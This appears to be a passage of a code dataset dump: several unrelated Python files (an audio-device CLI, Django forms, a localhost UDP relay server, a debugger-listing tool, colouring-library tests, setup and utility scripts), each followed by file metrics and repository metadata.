ctx.log('{0:2} {1:30} {2:10}'.format(
i,
entry.name[:30],
status))
@click.command('status', short_help='Display system info and audio devices')
@click.argument('model', required=False)
@pass_context
def cli(ctx, model):
"""Display system info and audio devices or inspect models."""
if model:
ctx.log(click.style('Inspect model "{}"'.format(model), bold=True))
try:
check_valid_model(model)
except FileNotFoundError:
ctx.elog('Could not find model.')
else:
# Load model and print a summary
from keras.models import load_model
model_name = '{}.h5'.format(model)
model_path = os.path.join(os.getcwd(), MODELS_FOLDER, model_name)
model_test = load_model(model_path)
model_test.summary()
else:
inputs = all_inputs()
outputs = all_outputs()
ctx.log(click.style('Audio input devices', bold=True))
list_audio_channels(ctx, inputs)
ctx.log('')
ctx.log(click.style('Audio output devices', bold=True))
list_audio_channels(ctx, outputs)
ctx.log('')
ctx.log(click.style('Generated voices', bold=True))
list_voices(ctx)
ctx.log('')
ctx.log(click.style('Trained models', bold=True))
list_models(ctx)
| 31.237624 | 77 | 0.559429 | 404 | 3,155 | 4.264851 | 0.232673 | 0.069646 | 0.034823 | 0.027858 | 0.428903 | 0.400464 | 0.311085 | 0.218224 | 0.171793 | 0.116657 | 0 | 0.026774 | 0.289699 | 3,155 | 100 | 78 | 31.55 | 0.740295 | 0.027892 | 0 | 0.37037 | 1 | 0 | 0.115648 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0.024691 | 0.08642 | 0 | 0.135802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2494ce7acc85768e320105780c75c15f78dc92ae | 1,702 | py | Python | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | null | null | null | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | 12 | 2019-10-22T23:16:38.000Z | 2022-03-11T23:17:45.000Z | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | 5 | 2019-12-19T06:18:42.000Z | 2022-01-07T01:16:18.000Z | from django import forms
from pbs.implementation.models import BurningPrescription, EdgingPlan, LightingSequence
from pbs.forms import HelperModelForm, WideTextarea
class BurningPrescriptionForm(forms.ModelForm):
class Meta:
model = BurningPrescription
fields = ('prescription', 'fuel_type', 'scorch', 'grassland_curing_min', 'grassland_curing_max')
class EdgingPlanForm(HelperModelForm):
def __init__(self, *args, **kwargs):
super(EdgingPlanForm, self).__init__(*args, **kwargs)
self.fields['location'].widget = WideTextarea()
self.fields['strategies'].widget = WideTextarea()
class Meta:
model = EdgingPlan
class LightingSequenceForm(HelperModelForm):
def __init__(self, *args, **kwargs):
super(LightingSequenceForm, self).__init__(*args, **kwargs)
self.fields['cellname'].widget.attrs.update({'class': 'span5'})
self.fields['strategies'].widget = WideTextarea()
self.fields['fuel_description'].widget = WideTextarea()
self.fields['resources'].widget = WideTextarea()
self.fields['wind_dir'].widget = WideTextarea()
self.fields['ffdi_min'].required = False
self.fields['ffdi_max'].required = False
self.fields['grassland_curing_min'].required = False
self.fields['grassland_curing_max'].required = False
self.fields['gfdi_min'].required = False
self.fields['gfdi_max'].required = False
self.fields['ros_min'].required = False
self.fields['ros_max'].required = False
self.fields['wind_min'].required = False
self.fields['wind_max'].required = False
class Meta:
model = LightingSequence
| 37 | 104 | 0.683901 | 175 | 1,702 | 6.451429 | 0.285714 | 0.150576 | 0.135518 | 0.183348 | 0.44287 | 0.189548 | 0.072631 | 0 | 0 | 0 | 0 | 0.000725 | 0.189189 | 1,702 | 45 | 105 | 37.822222 | 0.817391 | 0 | 0 | 0.205882 | 0 | 0 | 0.145711 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.088235 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24956ea92fc62e0f8fb21dbe9885cc8032b1251e | 571 | py | Python | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | import socket
import time
host = '127.0.0.1'
port = 5000
clients = []
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((host,port))
s.setblocking(0)
quitting = False
print "Server Started."
while not quitting:
try:
data, addr = s.recvfrom(1024)
if "Quit" in str(data):
quitting = True
if addr not in clients:
clients.append(addr)
print time.ctime(time.time()) + str(addr) + ": :" + str(data)
for client in clients:
s.sendto(data, client)
except:
pass
s.close()
| 18.419355 | 69 | 0.58669 | 78 | 571 | 4.269231 | 0.538462 | 0.048048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036765 | 0.285464 | 571 | 30 | 70 | 19.033333 | 0.779412 | 0 | 0 | 0 | 0 | 0 | 0.054482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.043478 | 0.086957 | null | null | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2495d28bed0397782cf935e677a1c24cddbc7aa5 | 2,245 | py | Python | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | # DExTer : Debugging Experience Tester
# ~~~~~~ ~ ~~ ~ ~~
#
# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""List debuggers tool."""
from dex.debugger.Debuggers import add_debugger_tool_arguments1
from dex.debugger.Debuggers import handle_debugger_tool_options1
from dex.debugger.Debuggers import Debuggers
from dex.tools import ToolBase
from dex.utils import Timer
from dex.utils.Exceptions import DebuggerException, Error
class Tool(ToolBase):
"""List all of the potential debuggers that DExTer knows about and whether
there is currently a valid interface available for them.
"""
@property
def name(self):
return 'DExTer list debuggers'
def add_tool_arguments(self, parser, defaults):
parser.description = Tool.__doc__
add_debugger_tool_arguments1(parser, defaults)
def handle_options(self, defaults):
handle_debugger_tool_options1(self.context, defaults)
def go(self):
with Timer('list debuggers'):
try:
Debuggers(self.context).list()
except DebuggerException as e:
raise Error(e)
return 0
| 40.089286 | 79 | 0.732294 | 304 | 2,245 | 5.345395 | 0.496711 | 0.054154 | 0.027692 | 0.044308 | 0.055385 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005034 | 0.203563 | 2,245 | 55 | 80 | 40.818182 | 0.903803 | 0.588419 | 0 | 0 | 0 | 0 | 0.039638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0.045455 | 0.590909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
24a9d193850ef9de315e00eae6af3dbda90f9774 | 2,025 | py | Python | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | 22 | 2020-07-28T19:45:32.000Z | 2022-03-09T04:48:51.000Z | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | null | null | null | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | 1 | 2021-11-12T19:23:59.000Z | 2021-11-12T19:23:59.000Z | import pytest
from coloring import create_color
from coloring.consts import *
def test_create_color():
text = "Hello"
mycolor = create_color(120, 160, 200)
colored_text = mycolor(text)
assert colored_text == f"{CSI}38;2;120;160;200m{text}{RESET_COLOR}"
mycolor = create_color(128, 128, 128)
colored_text = mycolor(text)
assert colored_text == f"{CSI}38;2;128;128;128m{text}{RESET_COLOR}"
def test_create_color_bold():
text = "Hello"
mycolor = create_color(120, 160, 200, s="b")
colored_text = mycolor(text)
assert (
colored_text
== f"{CSI}38;2;120;160;200m{BOLD}{text}{RESET_BOLD_AND_DIM}{RESET_COLOR}"
)
def test_create_color_underline():
text = "Hello"
mycolor = create_color(120, 160, 200, s="u")
colored_text = mycolor(text)
assert (
colored_text
== f"{CSI}38;2;120;160;200m{UNDERLINE}{text}{RESET_UNDERLINE}{RESET_COLOR}"
)
def test_create_color_cross():
text = "Hello"
mycolor = create_color(120, 160, 200, s="c")
colored_text = mycolor(text)
assert (
colored_text == f"{CSI}38;2;120;160;200m{CROSS}{text}{RESET_CROSS}{RESET_COLOR}"
)
def test_create_color_style_only():
# Red background
text = "Hello"
mycolor = create_color(s="b")
colored_text = mycolor(text)
assert colored_text == f"{BOLD}{text}{RESET_BOLD_AND_DIM}"
def test_create_color_background():
# Red background
text = "Hello"
mycolor = create_color(bg=(120, 160, 200))
colored_text = mycolor(text)
assert colored_text == f"{CSI}48;2;120;160;200m{text}{RESET_BACKGROUND}"
mycolor = create_color(bg=(128, 128, 128))
colored_text = mycolor(text)
assert colored_text == f"{CSI}48;2;128;128;128m{text}{RESET_BACKGROUND}"
def test_create_color_signature_error():
with pytest.raises(TypeError):
create_color(12, 12)
with pytest.raises(TypeError):
create_color(12, 12, "lol")
with pytest.raises(TypeError):
create_color(12)
| 25 | 88 | 0.665185 | 286 | 2,025 | 4.482517 | 0.164336 | 0.163027 | 0.112324 | 0.137285 | 0.776911 | 0.776911 | 0.606084 | 0.514041 | 0.430577 | 0.344774 | 0 | 0.096794 | 0.199012 | 2,025 | 80 | 89 | 25.3125 | 0.693588 | 0.014321 | 0 | 0.407407 | 0 | 0.055556 | 0.220773 | 0.202208 | 0 | 0 | 0 | 0 | 0.148148 | 1 | 0.12963 | false | 0 | 0.055556 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24aaa027a369814fc245e15cc638702d426aa217 | 429 | py | Python | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | 1 | 2020-10-12T12:12:28.000Z | 2020-10-12T12:12:28.000Z | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | null | null | null | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | 1 | 2020-12-21T18:24:26.000Z | 2020-12-21T18:24:26.000Z | from setuptools import setup
setup(name='embed',
version='0.1',
description='Basic immplementation of knowledge graph embedding. ',
url='https://github.com/pbloem/embed',
author='Peter Bloem',
author_email='embed@peterbloem.nl',
license='MIT',
packages=['embed'],
install_requires=[
'torch',
'tensorboard',
'tqdm'
],
zip_safe=False) | 26.8125 | 73 | 0.58042 | 43 | 429 | 5.72093 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006494 | 0.282051 | 429 | 16 | 74 | 26.8125 | 0.792208 | 0 | 0 | 0 | 0 | 0 | 0.346512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24b074035a2ee27584cb43aeb963e311d3388a92 | 2,115 | py | Python | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | 2 | 2015-08-01T16:00:44.000Z | 2017-02-24T21:06:50.000Z | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | null | null | null | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/local/bin/python
# encoding: utf-8
"""
*Code elements for TBS htmlframework*
:Author:
David Young
:Date Created:
April 16, 2013
:dryx syntax:
- ``xxx`` = come back here and do some more work
- ``_someObject`` = a 'private' object that should only be changed for debugging
:Notes:
- If you have any questions requiring this script please email me: davidrobertyoung@gmail.com
"""
###################################################################
# CLASSES #
###################################################################
###################################################################
# PUBLIC FUNCTIONS #
###################################################################
# LAST MODIFIED : April 16, 2013
# CREATED : April 16, 2013
# AUTHOR : DRYX
def code(
content="",
inline=True,
scroll=False):
"""
*Generate a code section*
**Key Arguments:**
- ``content`` -- the content of the code block
- ``inline`` -- inline or block?
- ``scroll`` -- give the block a scroll bar on y-axis?
**Return:**
- ``code`` -- the code section
"""
################ > IMPORTS ################
## STANDARD LIB ##
## THIRD PARTY ##
## LOCAL APPLICATION ##
################ >ACTION(S) ################
if scroll:
scroll = "pre-scrollable"
else:
scroll = ""
if inline:
code = """<code>%(content)s</code>""" % locals()
else:
code = """
<pre class="%(scroll)s"><code>%(content)s</code></pre>""" % locals()
return code
###################################################################
# PRIVATE (HELPER) FUNCTIONS #
###################################################################
###################################################################
# TEMPLATE FUNCTIONS #
###################################################################
| 29.375 | 97 | 0.35461 | 153 | 2,115 | 4.895425 | 0.627451 | 0.028037 | 0.044059 | 0.048064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012298 | 0.269504 | 2,115 | 71 | 98 | 29.788732 | 0.472492 | 0.468558 | 0 | 0.142857 | 0 | 0 | 0.257985 | 0.179361 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24b62e0fc473c84a416b454f895c5c95bb5b4121 | 713 | py | Python | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | 1 | 2015-04-18T16:48:48.000Z | 2015-04-18T16:48:48.000Z | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | null | null | null | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright Michael Groys, 2014
#
import sys
from bin_utils import *
usage = "Usage: cat <file>..."
if len(sys.argv) <= 1:
files = ["-"]
elif sys.argv[1] in ["-h", "--help"]:
print usage
sys.exit()
else:
files = sys.argv[1:]
reopenFileInBinMode(sys.stdout)
openMode = "rb"
for fileName in expandFiles(files):
if fileName == "-":
fileObj = sys.stdin
reopenFileInBinMode(fileObj)
else:
try:
fileObj = open(fileName, openMode)
except Exception as e:
print >> sys.stderr, str(e)
sys.exit(1)
copyStream(fileObj, sys.stdout)
if fileObj != sys.stdin:
fileObj.close()
| 19.805556 | 47 | 0.54979 | 81 | 713 | 4.82716 | 0.530864 | 0.053708 | 0.061381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016427 | 0.316971 | 713 | 35 | 48 | 20.371429 | 0.786448 | 0.040673 | 0 | 0.08 | 0 | 0 | 0.051163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.08 | null | null | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.